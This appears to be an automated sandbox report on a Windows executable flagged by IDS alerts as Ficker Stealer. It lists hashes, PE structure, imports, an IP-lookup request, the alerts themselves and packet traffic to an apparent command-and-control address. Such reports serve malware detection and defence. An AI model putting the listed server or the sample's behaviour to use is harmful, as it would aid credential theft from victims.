                Process:C:\Users\user\Desktop\8s7bEDfYhT.exe
                File Type:ASCII text, with no line terminators
                Category:downloaded
                Size (bytes):10
                Entropy (8bit):2.8464393446710154
                Encrypted:false
                SSDEEP:3:HLLr:fr
                MD5:60B1FCE0F5D79C061DD6FECDAC64F306
                SHA1:1DF9D4411BEDD84FF3C6E6F41988F4CF6CC0D67F
                SHA-256:3C0ACD03C25C6940300B9A18362B6893BC7A5C11EE8F3140868E143ADBB4B8EE
                SHA-512:7B292792E06696C3B14539D800D4D2926DA2C3C30447D8AEED9E863174BAD3871CEEE19BC832F31A69A574AB3394C4ADF2B1C10A6F96140AD1AE6D2440E905A1
                Malicious:false
                Reputation:moderate, very likely benign file
                IE Cache URL:http://api.ipify.org/?format=xml
                Preview: 84.17.52.3

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):7.382140458014918
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.94%
                • Clipper DOS Executable (2020/12) 0.02%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • VXD Driver (31/22) 0.00%
                File name:8s7bEDfYhT.exe
                File size:381966
                MD5:e0f6d15001d810320bbe9614c9365ca6
                SHA1:f589ae105a5b33e6fcca8afc7f8688652f7c5392
                SHA256:f009a71cf1050cc8c50a9b1accf3e28f174e75eda5f5ebb4764d90baa443aa9c
                SHA512:326e3f70cea545a3d0a1cc98d8feb9656ad0bfd39c8d36716a7fd7a4e65feeca57bea71d26e7c3e122af45b0ee95e5a87206f46a9942c5115b74fe2f94db985b
                SSDEEP:6144:XbkSyz/v91LEqvt5uXF9RXG/VG25A89xs+vWcQxm0JtBRLHe07cyQGTYRPp:XbkSyz/bQegVHXWhActuckJJtzL+L1RR
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................PE..L......]...........

                File Icon

                Icon Hash:eeeddae2f25ae476

                Static PE Info

                General

                Entrypoint:0x402fa6
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                DLL Characteristics:TERMINAL_SERVER_AWARE
                Time Stamp:0x5DB4C581 [Sat Oct 26 22:15:29 2019 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:0
                File Version Major:5
                File Version Minor:0
                Subsystem Version Major:5
                Subsystem Version Minor:0
                Import Hash:ac7c395149149fcfaf0ed257b291de6e

                Entrypoint Preview

                Instruction
                call 00007F42D4441E70h
                jmp 00007F42D44393FEh
                mov edi, edi
                push ebp
                mov ebp, esp
                sub esp, 20h
                mov eax, dword ptr [ebp+08h]
                push esi
                push edi
                push 00000008h
                pop ecx
                mov esi, 0047B2E8h
                lea edi, dword ptr [ebp-20h]
                rep movsd
                mov dword ptr [ebp-08h], eax
                mov eax, dword ptr [ebp+0Ch]
                pop edi
                mov dword ptr [ebp-04h], eax
                pop esi
                test eax, eax
                je 00007F42D443958Eh
                test byte ptr [eax], 00000008h
                je 00007F42D4439589h
                mov dword ptr [ebp-0Ch], 01994000h
                lea eax, dword ptr [ebp-0Ch]
                push eax
                push dword ptr [ebp-10h]
                push dword ptr [ebp-1Ch]
                push dword ptr [ebp-20h]
                call dword ptr [0047B09Ch]
                leave
                retn 0008h
                mov edi, edi
                push ebp
                mov ebp, esp
                push ecx
                push ebx
                mov eax, dword ptr [ebp+0Ch]
                add eax, 0Ch
                mov dword ptr [ebp-04h], eax
                mov ebx, dword ptr fs:[00000000h]
                mov eax, dword ptr [ebx]
                mov dword ptr fs:[00000000h], eax
                mov eax, dword ptr [ebp+08h]
                mov ebx, dword ptr [ebp+0Ch]
                mov ebp, dword ptr [ebp-04h]
                mov esp, dword ptr [ebx-04h]
                jmp eax
                pop ebx
                leave
                retn 0008h
                pop eax
                pop ecx
                xchg dword ptr [esp], eax
                jmp eax
                mov edi, edi
                push ebp
                mov ebp, esp
                push ecx
                push ecx
                push ebx
                push esi
                push edi
                mov esi, dword ptr fs:[00000000h]
                mov dword ptr [ebp-04h], esi
                mov dword ptr [ebp-08h], 00403060h
                push 00000000h
                push dword ptr [ebp+0Ch]
                push dword ptr [ebp-08h]
                push dword ptr [ebp+08h]
                call 00007F42D445C74Fh
                mov eax, dword ptr [ebp+0Ch]
                mov eax, dword ptr [eax+04h]
                and eax, FFFFFFFDh
                mov ecx, dword ptr [ebp+0Ch]
                mov dword ptr [ecx+00h], eax

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x7ea9c0x28.new
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x800000x7058.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x880000x1970.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x7da300x18.new
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x7d9e80x40.new
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x7b0000x1d8.new
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000x4dcf70x4de00False0.767781902087data7.54573831986IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                .data0x4f0000x29c280x1800False0.178548177083data2.08844026956IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                .kug0x790000x10x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .tls0x7a0000x90x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                .new0x7b0000x453e0x4600False0.370982142857data5.3686717182IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .rsrc0x800000x70580x7200False0.60663377193data5.98363384389IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc0x880000x1db80x1e00False0.698828125data6.13983891782IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                Resources

                NameRVASizeTypeLanguageCountry
                RT_CURSOR0x86bb00x134data
                RT_ICON0x803600xea8dataSpanishChile
                RT_ICON0x812080x8a8dataSpanishChile
                RT_ICON0x81ab00x6c8dataSpanishChile
                RT_ICON0x821780x568GLS_BINARY_LSB_FIRSTSpanishChile
                RT_ICON0x826e00x25a8dBase III DBT, version number 0, next free block index 40SpanishChile
                RT_ICON0x84c880x10a8dataSpanishChile
                RT_ICON0x85d300x988dBase III DBT, version number 0, next free block index 40SpanishChile
                RT_ICON0x866b80x468GLS_BINARY_LSB_FIRSTSpanishChile
                RT_STRING0x86ec00x192dataSpanishChile
                RT_ACCELERATOR0x86b980x18dataSpanishChile
                RT_GROUP_CURSOR0x86ce80x14Lotus unknown worksheet or configuration, revision 0x1
                RT_GROUP_ICON0x86b200x76dataSpanishChile
                RT_VERSION0x86d000x1c0data

                Imports

                DLLImport
                KERNEL32.dllWriteConsoleOutputCharacterW, FindResourceExW, FindResourceW, SetWaitableTimer, InterlockedIncrement, SetConsoleTextAttribute, GetCurrentProcess, GetModuleHandleExW, SetConsoleScreenBufferSize, SetTapeParameters, GetModuleHandleW, SetFileTime, TzSpecificLocalTimeToSystemTime, GetLocaleInfoW, SizeofResource, SetSystemTimeAdjustment, GetConsoleAliasW, GetFileAttributesW, SetTimeZoneInformation, TerminateProcess, FileTimeToSystemTime, GetCompressedFileSizeA, GlobalUnlock, DisconnectNamedPipe, LCMapStringA, GetLastError, GetProcAddress, SetFileAttributesA, GetAtomNameA, OpenWaitableTimerW, LocalAlloc, GlobalFindAtomW, GlobalWire, lstrcatW, VirtualProtect, FindAtomW, LocalFree, lstrcpyW, GetStartupInfoW, RaiseException, RtlUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, HeapFree, EnterCriticalSection, LeaveCriticalSection, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, InterlockedDecrement, GetCurrentThread, Sleep, HeapSize, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, HeapCreate, HeapDestroy, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, FatalAppExitA, VirtualAlloc, HeapReAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, MultiByteToWideChar, SetConsoleCtrlHandler, FreeLibrary, InterlockedExchange, LoadLibraryA, InitializeCriticalSectionAndSpinCount, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, CloseHandle, CreateFileA, FlushFileBuffers, LCMapStringW, GetStringTypeA, GetStringTypeW, GetTimeFormatA, GetDateFormatA, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, ReadFile, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetEndOfFile, GetProcessHeap, GetTimeZoneInformation, CompareStringA, CompareStringW, SetEnvironmentVariableA

                Version Infos

                DescriptionData
                InternalNamesgalimatimod
                FileVersions7.0.2.54
                LegalCopyrightsWsekde
                ProductVersions7.0.21.21
                Translation0x0139 0x0c6b

                Possible Origin

                Language of compilation systemCountry where language is spokenMap
                SpanishChile

                Network Behavior

                Snort IDS Alerts

                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                04/26/21-13:12:08.554251ICMP384ICMP PING192.168.2.613.107.4.50
                04/26/21-13:12:08.591033ICMP449ICMP Time-To-Live Exceeded in Transit84.17.52.126192.168.2.6
                04/26/21-13:12:08.591389ICMP384ICMP PING192.168.2.613.107.4.50
                04/26/21-13:12:08.628291ICMP449ICMP Time-To-Live Exceeded in Transit5.56.20.161192.168.2.6
                04/26/21-13:12:08.629295ICMP384ICMP PING192.168.2.613.107.4.50
                04/26/21-13:12:08.666226ICMP449ICMP Time-To-Live Exceeded in Transit91.206.52.152192.168.2.6
                04/26/21-13:12:08.666913ICMP384ICMP PING192.168.2.613.107.4.50
                04/26/21-13:12:12.369641ICMP384ICMP PING192.168.2.613.107.4.50
                04/26/21-13:12:13.520112TCP2031132ET TROJAN Win32/Ficker Stealer Activity M34971480192.168.2.635.203.73.169
                04/26/21-13:12:16.370123ICMP384ICMP PING192.168.2.613.107.4.50
                04/26/21-13:12:19.770051TCP2031132ET TROJAN Win32/Ficker Stealer Activity M34972280192.168.2.635.203.73.169
                04/26/21-13:12:20.370841ICMP384ICMP PING192.168.2.613.107.4.50
                04/26/21-13:12:24.370953ICMP384ICMP PING192.168.2.613.107.4.50
                04/26/21-13:12:28.371033ICMP384ICMP PING192.168.2.613.107.4.50

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Apr 26, 2021 13:12:12.297265053 CEST4971280192.168.2.654.225.155.255
                Apr 26, 2021 13:12:12.433270931 CEST804971254.225.155.255192.168.2.6
                Apr 26, 2021 13:12:12.433664083 CEST4971280192.168.2.654.225.155.255
                Apr 26, 2021 13:12:12.434504032 CEST4971280192.168.2.654.225.155.255
                Apr 26, 2021 13:12:12.571733952 CEST804971254.225.155.255192.168.2.6
                Apr 26, 2021 13:12:12.625264883 CEST804971254.225.155.255192.168.2.6
                Apr 26, 2021 13:12:12.625365973 CEST4971280192.168.2.654.225.155.255
                Apr 26, 2021 13:12:13.012413979 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:13.149697065 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:13.149804115 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:13.519902945 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:13.520112038 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:13.520215988 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:13.520247936 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:13.520301104 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:13.520351887 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:13.520704031 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:13.520751953 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:13.657532930 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:13.657614946 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:13.657665968 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:13.657712936 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:13.657776117 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:13.657802105 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:13.657829046 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:15.350039959 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:15.350083113 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:15.404056072 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:15.404092073 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:15.405371904 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:15.405450106 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:15.405512094 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:15.405560970 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:15.428519011 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:15.428610086 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:15.488107920 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:15.488132000 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:15.543735027 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:15.543772936 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:15.543790102 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:15.543807030 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:15.543826103 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:15.543843031 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:15.566382885 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:15.566406012 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:15.635273933 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:15.635320902 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:15.635735989 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:15.635785103 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:15.636106968 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:15.636162043 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:15.775974035 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:15.775995970 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:15.776005030 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:15.776012897 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:15.776024103 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:15.776036024 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:15.804207087 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:15.943255901 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:15.943555117 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.080522060 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.080554008 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.080720901 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.080847025 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.124277115 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.124490976 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.217633009 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.217786074 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.217807055 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.217945099 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.218041897 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.218111038 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.219118118 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.219208956 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.219351053 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.219470024 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.261267900 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.261542082 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.355576992 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.355746031 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.355880976 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.355982065 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.356197119 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.356306076 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.356910944 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.356996059 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.357230902 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.357315063 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.357597113 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.357733965 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.357968092 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.358032942 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.358270884 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.358355999 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.399313927 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.399477005 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.492526054 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.492695093 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.492765903 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.492840052 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.493117094 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.493395090 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.493458033 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.493633986 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.493863106 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.493978024 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.494164944 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.494280100 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.494481087 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.494621992 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.494882107 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.494992018 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.495206118 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.495326042 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.536047935 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.536231995 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.536323071 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.536407948 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.631408930 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.631766081 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.631916046 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.632345915 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.632556915 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.632651091 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.633579016 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.633761883 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.634041071 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.634193897 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.634294033 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.634430885 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.634727001 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.635181904 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.635941982 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.636101961 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.636317968 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.636451006 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.636673927 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.636778116 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.636918068 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.637053013 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.637105942 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.637202978 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.637439966 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.637717009 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.638190985 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.638319969 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.638731003 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.638901949 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.675158024 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.675211906 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.768420935 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.768573999 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.768857956 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.769218922 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.769485950 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.769871950 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.770462990 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.770816088 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.771162987 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.771449089 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.771820068 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.772089958 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.772380114 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.772474051 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.772526026 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.772768021 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.772790909 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.772805929 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.772875071 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.773052931 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.773118973 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.774480104 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.774555922 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.775765896 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.775862932 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.776757002 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.776842117 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.777828932 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.777904034 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.910224915 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.910384893 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.910675049 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.910772085 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.910950899 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.911148071 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.911218882 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.911349058 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.911411047 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.911467075 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.911550999 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.911748886 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.911842108 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.912458897 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.912563086 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.913660049 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.913769007 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.914658070 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.914793015 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:16.915743113 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:16.915836096 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:17.047192097 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:17.047415972 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:17.047755003 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:17.047924042 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:17.048000097 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:17.048078060 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:17.048175097 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:17.048381090 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:17.048508883 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:17.048703909 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:17.048830986 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:17.049067020 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:17.049165010 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:17.049292088 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:17.049403906 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:17.049443007 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:17.049556971 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:17.049773932 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:17.050158024 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:17.051173925 CEST804971435.203.73.169192.168.2.6
